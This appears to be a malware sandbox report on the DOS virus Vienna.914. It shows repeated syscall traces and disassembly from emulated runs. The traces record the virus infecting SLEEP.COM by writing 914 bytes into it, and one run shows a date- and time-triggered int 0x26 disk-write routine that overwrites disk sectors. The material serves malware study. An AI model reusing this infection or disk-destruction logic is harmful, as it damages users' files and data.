Sample viewer

vx.netlux.org/Virus.DOS.Vienna.914

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:09:38.782815841Z 255 PC: 12a49 | UNKNOWN!
2018-12-17T23:09:38.785392772Z 48 PC: 12a69 | Get DOS version
2018-12-17T23:09:38.788410391Z 44 PC: 12a75 | Get time 0x12a75: xor bx, bx
0x12a77: cmp dl, 4
0x12a7a: jle 0x12a7e
0x12a7c: jmp 0x12a90
0x12a7e: mov dl, byte ptr [bx + si + 0x8f]
0x12a82: or dl, dl
0x12a84: je 0x12a90
0x12a86: sub dl, 0x4b
0x12a89: mov ah, 2
0x12a8b: int 0x21
0x12a8d: inc bx
0x12a8e: jmp 0x12a7e
0x12a90: mov ah, 0x2a
0x12a92: int 0x21
0x12a94: cmp dh, 3
0x12a97: jne 0x12ad9
0x12a99: cmp dl, 0x18
0x12a9c: jne 0x12ad9
0x12a9e: mov ah, 0x2c
0x12aa0: int 0x21
2018-12-17T23:09:38.79131488Z 42 PC: 12a94 | Get date 0x12a94: cmp dh, 3
0x12a97: jne 0x12ad9
0x12a99: cmp dl, 0x18
0x12a9c: jne 0x12ad9
0x12a9e: mov ah, 0x2c
0x12aa0: int 0x21
0x12aa2: cmp ch, 7
0x12aa5: jne 0x12ad9
0x12aa7: cmp cl, 0x2d
0x12aaa: jne 0x12ad9
0x12aac: xor bx, bx
0x12aae: mov dl, byte ptr [bx + si + 0xf1]
0x12ab2: or dl, dl
0x12ab4: je 0x12ac0
0x12ab6: sub dl, 0x4b
0x12ab9: mov ah, 2
0x12abb: int 0x21
0x12abd: inc bx
0x12abe: jmp 0x12aae
0x12ac0: mov al, 0
2018-12-17T23:09:38.795324495Z 47 PC: 12ade | Get disk transfer address
2018-12-17T23:09:38.797395816Z 26 PC: 12aef | Set disk transfer address
2018-12-17T23:09:38.799155946Z 78 PC: 12b7d | Find first file
2018-12-17T23:09:38.807309013Z 67 PC: 12bba | Get or set file attributes
2018-12-17T23:09:38.814295562Z 67 PC: 12bcc | Get or set file attributes
2018-12-17T23:09:38.831803677Z 61 PC: 12bd8 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:09:38.840782944Z 87 PC: 12be5 | Get or set file date and time
2018-12-17T23:09:38.84247939Z 63 PC: 12bf9 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:09:38.849700113Z 66 PC: 12c0a | Move file pointer
2018-12-17T23:09:38.851601278Z 64 PC: 12c30 | Write file or device (Write 914 bytes on handle 5)
2018-12-17T23:09:38.8616318Z 66 PC: 12c41 | Move file pointer
2018-12-17T23:09:38.863303731Z 64 PC: 12c52 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:09:38.871318529Z 87 PC: 12c66 | Get or set file date and time
2018-12-17T23:09:38.87369558Z 62 PC: 12c6b | Close file
2018-12-17T23:09:38.882580264Z 67 PC: 12c7a | Get or set file attributes
2018-12-17T23:09:38.908578592Z 26 PC: 12c86 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16601,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:53:32.855754511Z 255 PC: 12a49 | UNKNOWN!
2018-12-25T12:53:32.856902489Z 48 PC: 12a69 | Get DOS version
2018-12-25T12:53:32.858001934Z 44 PC: 12a75 | Get time 0x12a75: xor bx, bx
0x12a77: cmp dl, 4
0x12a7a: jle 0x12a7e
0x12a7c: jmp 0x12a90
0x12a7e: mov dl, byte ptr [bx + si + 0x8f]
0x12a82: or dl, dl
0x12a84: je 0x12a90
0x12a86: sub dl, 0x4b
0x12a89: mov ah, 2
0x12a8b: int 0x21
0x12a8d: inc bx
0x12a8e: jmp 0x12a7e
0x12a90: mov ah, 0x2a
0x12a92: int 0x21
0x12a94: cmp dh, 3
0x12a97: jne 0x12ad9
0x12a99: cmp dl, 0x18
0x12a9c: jne 0x12ad9
0x12a9e: mov ah, 0x2c
0x12aa0: int 0x21
2018-12-25T12:53:32.860314019Z 42 PC: 12a94 | Get date 0x12a94: cmp dh, 3
0x12a97: jne 0x12ad9
0x12a99: cmp dl, 0x18
0x12a9c: jne 0x12ad9
0x12a9e: mov ah, 0x2c
0x12aa0: int 0x21
0x12aa2: cmp ch, 7
0x12aa5: jne 0x12ad9
0x12aa7: cmp cl, 0x2d
0x12aaa: jne 0x12ad9
0x12aac: xor bx, bx
0x12aae: mov dl, byte ptr [bx + si + 0xf1]
0x12ab2: or dl, dl
0x12ab4: je 0x12ac0
0x12ab6: sub dl, 0x4b
0x12ab9: mov ah, 2
0x12abb: int 0x21
0x12abd: inc bx
0x12abe: jmp 0x12aae
0x12ac0: mov al, 0
2018-12-25T12:53:32.862964037Z 47 PC: 12ade | Get disk transfer address
2018-12-25T12:53:32.864020419Z 26 PC: 12aef | Set disk transfer address
2018-12-25T12:53:32.86512824Z 78 PC: 12b7d | Find first file
2018-12-25T12:53:32.871711127Z 67 PC: 12bba | Get or set file attributes
2018-12-25T12:53:32.877820324Z 67 PC: 12bcc | Get or set file attributes
2018-12-25T12:53:33.012287928Z 61 PC: 12bd8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:53:33.019260308Z 87 PC: 12be5 | Get or set file date and time
2018-12-25T12:53:33.020553826Z 63 PC: 12bf9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:53:33.026723667Z 66 PC: 12c0a | Move file pointer
2018-12-25T12:53:33.028467075Z 64 PC: 12c30 | Write file or device (Write 914 bytes on handle 5)
2018-12-25T12:53:33.036791316Z 66 PC: 12c41 | Move file pointer
2018-12-25T12:53:33.038105307Z 64 PC: 12c52 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:53:33.045527379Z 87 PC: 12c66 | Get or set file date and time
2018-12-25T12:53:33.046925138Z 62 PC: 12c6b | Close file
2018-12-25T12:53:33.054510674Z 67 PC: 12c7a | Get or set file attributes
2018-12-25T12:53:33.064696115Z 26 PC: 12c86 | Set disk transfer address

{"DateBased":true,"Day":24,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16601,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:53:33.449407984Z 255 PC: 12a49 | UNKNOWN!
2018-12-25T12:53:33.450650854Z 48 PC: 12a69 | Get DOS version
2018-12-25T12:53:33.451679906Z 44 PC: 12a75 | Get time 0x12a75: xor bx, bx
0x12a77: cmp dl, 4
0x12a7a: jle 0x12a7e
0x12a7c: jmp 0x12a90
0x12a7e: mov dl, byte ptr [bx + si + 0x8f]
0x12a82: or dl, dl
0x12a84: je 0x12a90
0x12a86: sub dl, 0x4b
0x12a89: mov ah, 2
0x12a8b: int 0x21
0x12a8d: inc bx
0x12a8e: jmp 0x12a7e
0x12a90: mov ah, 0x2a
0x12a92: int 0x21
0x12a94: cmp dh, 3
0x12a97: jne 0x12ad9
0x12a99: cmp dl, 0x18
0x12a9c: jne 0x12ad9
0x12a9e: mov ah, 0x2c
0x12aa0: int 0x21
2018-12-25T12:53:33.453577837Z 42 PC: 12a94 | Get date 0x12a94: cmp dh, 3
0x12a97: jne 0x12ad9
0x12a99: cmp dl, 0x18
0x12a9c: jne 0x12ad9
0x12a9e: mov ah, 0x2c
0x12aa0: int 0x21
0x12aa2: cmp ch, 7
0x12aa5: jne 0x12ad9
0x12aa7: cmp cl, 0x2d
0x12aaa: jne 0x12ad9
0x12aac: xor bx, bx
0x12aae: mov dl, byte ptr [bx + si + 0xf1]
0x12ab2: or dl, dl
0x12ab4: je 0x12ac0
0x12ab6: sub dl, 0x4b
0x12ab9: mov ah, 2
0x12abb: int 0x21
0x12abd: inc bx
0x12abe: jmp 0x12aae
0x12ac0: mov al, 0
2018-12-25T12:53:33.462876701Z 44 PC: 12aa2 | Get time 0x12aa2: cmp ch, 7
0x12aa5: jne 0x12ad9
0x12aa7: cmp cl, 0x2d
0x12aaa: jne 0x12ad9
0x12aac: xor bx, bx
0x12aae: mov dl, byte ptr [bx + si + 0xf1]
0x12ab2: or dl, dl
0x12ab4: je 0x12ac0
0x12ab6: sub dl, 0x4b
0x12ab9: mov ah, 2
0x12abb: int 0x21
0x12abd: inc bx
0x12abe: jmp 0x12aae
0x12ac0: mov al, 0
0x12ac2: mov cx, 0xff
0x12ac5: mov dx, 1
0x12ac8: int 0x26
0x12aca: jb 0x12acf
0x12acc: add sp, 2
0x12acf: inc al
2018-12-25T12:53:33.464868222Z 47 PC: 12ade | Get disk transfer address
2018-12-25T12:53:33.465777193Z 26 PC: 12aef | Set disk transfer address
2018-12-25T12:53:33.466972591Z 78 PC: 12b7d | Find first file
2018-12-25T12:53:33.472864998Z 67 PC: 12bba | Get or set file attributes
2018-12-25T12:53:33.478137597Z 67 PC: 12bcc | Get or set file attributes
2018-12-25T12:53:33.495031013Z 61 PC: 12bd8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:53:33.50143456Z 87 PC: 12be5 | Get or set file date and time
2018-12-25T12:53:33.502704197Z 63 PC: 12bf9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:53:33.508752429Z 66 PC: 12c0a | Move file pointer
2018-12-25T12:53:33.510443039Z 64 PC: 12c30 | Write file or device (Write 914 bytes on handle 5)
2018-12-25T12:53:33.518544852Z 66 PC: 12c41 | Move file pointer
2018-12-25T12:53:33.51973424Z 64 PC: 12c52 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:53:33.526710412Z 87 PC: 12c66 | Get or set file date and time
2018-12-25T12:53:33.528079251Z 62 PC: 12c6b | Close file
2018-12-25T12:53:33.535340196Z 67 PC: 12c7a | Get or set file attributes
2018-12-25T12:53:33.545264325Z 26 PC: 12c86 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16601,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:53:33.681911069Z 255 PC: 12a49 | UNKNOWN!
2018-12-25T12:53:33.687282356Z 48 PC: 12a69 | Get DOS version
2018-12-25T12:53:33.688461538Z 44 PC: 12a75 | Get time 0x12a75: xor bx, bx
0x12a77: cmp dl, 4
0x12a7a: jle 0x12a7e
0x12a7c: jmp 0x12a90
0x12a7e: mov dl, byte ptr [bx + si + 0x8f]
0x12a82: or dl, dl
0x12a84: je 0x12a90
0x12a86: sub dl, 0x4b
0x12a89: mov ah, 2
0x12a8b: int 0x21
0x12a8d: inc bx
0x12a8e: jmp 0x12a7e
0x12a90: mov ah, 0x2a
0x12a92: int 0x21
0x12a94: cmp dh, 3
0x12a97: jne 0x12ad9
0x12a99: cmp dl, 0x18
0x12a9c: jne 0x12ad9
0x12a9e: mov ah, 0x2c
0x12aa0: int 0x21
2018-12-25T12:53:33.690507903Z 42 PC: 12a94 | Get date 0x12a94: cmp dh, 3
0x12a97: jne 0x12ad9
0x12a99: cmp dl, 0x18
0x12a9c: jne 0x12ad9
0x12a9e: mov ah, 0x2c
0x12aa0: int 0x21
0x12aa2: cmp ch, 7
0x12aa5: jne 0x12ad9
0x12aa7: cmp cl, 0x2d
0x12aaa: jne 0x12ad9
0x12aac: xor bx, bx
0x12aae: mov dl, byte ptr [bx + si + 0xf1]
0x12ab2: or dl, dl
0x12ab4: je 0x12ac0
0x12ab6: sub dl, 0x4b
0x12ab9: mov ah, 2
0x12abb: int 0x21
0x12abd: inc bx
0x12abe: jmp 0x12aae
0x12ac0: mov al, 0
2018-12-25T12:53:33.692970336Z 47 PC: 12ade | Get disk transfer address
2018-12-25T12:53:33.694284891Z 26 PC: 12aef | Set disk transfer address
2018-12-25T12:53:33.695313264Z 78 PC: 12b7d | Find first file
2018-12-25T12:53:33.702093627Z 67 PC: 12bba | Get or set file attributes
2018-12-25T12:53:33.709710899Z 67 PC: 12bcc | Get or set file attributes
2018-12-25T12:53:33.724997694Z 61 PC: 12bd8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:53:33.729471972Z 87 PC: 12be5 | Get or set file date and time
2018-12-25T12:53:33.736522049Z 63 PC: 12bf9 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:53:33.743475838Z 66 PC: 12c0a | Move file pointer
2018-12-25T12:53:33.744885853Z 64 PC: 12c30 | Write file or device (Write 914 bytes on handle 5)
2018-12-25T12:53:33.755045841Z 66 PC: 12c41 | Move file pointer
2018-12-25T12:53:33.757856845Z 64 PC: 12c52 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:53:33.765967862Z 87 PC: 12c66 | Get or set file date and time
2018-12-25T12:53:33.768136427Z 62 PC: 12c6b | Close file
2018-12-25T12:53:33.777228504Z 67 PC: 12c7a | Get or set file attributes
2018-12-25T12:53:33.788606857Z 26 PC: 12c86 | Set disk transfer address